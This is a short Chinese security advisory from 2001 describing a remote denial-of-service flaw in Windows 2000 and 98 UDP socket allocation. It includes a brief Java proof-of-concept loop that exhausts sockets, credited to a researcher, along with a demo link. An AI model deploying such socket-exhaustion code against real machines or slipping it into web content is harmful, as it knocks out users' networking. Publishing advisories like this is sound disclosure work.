Microsoft Windows UDP Socket 存在拒绝服务攻击漏洞发布时间:2001-02-09 更新时间:2001-02-09 严重程度:低 威胁程度:远程拒绝服务 错误类型:设计错误 利用方式:服务器模式 受影响系统 受影响系统:详细描述 W2K和WIN98存在一个拒绝服务漏洞,接受到一恶意定制的EMAIL或者访问存在恶意代码的站点可以导致阻止W2K从DNS解析,而将阻止W98接受任何TCP新连接。问题主要是由于用户应用程序的网络套接口缺少分配限制。 测试代码 攻击实例: Georgi Guninski <guninski@guninski.com>提供了下面的EXPLOIT程序: for(i=0;i<m;i++) { try { DatagramSocket d = new DatagramSocket();v.addElement(d);} catch (Exception e) {System.out.println("Exhausted, i="+i);} } 并在下面的站点进行了演示: http://www.guninski.com/winudpdos.html 解决方案 尚无 相关信息 |
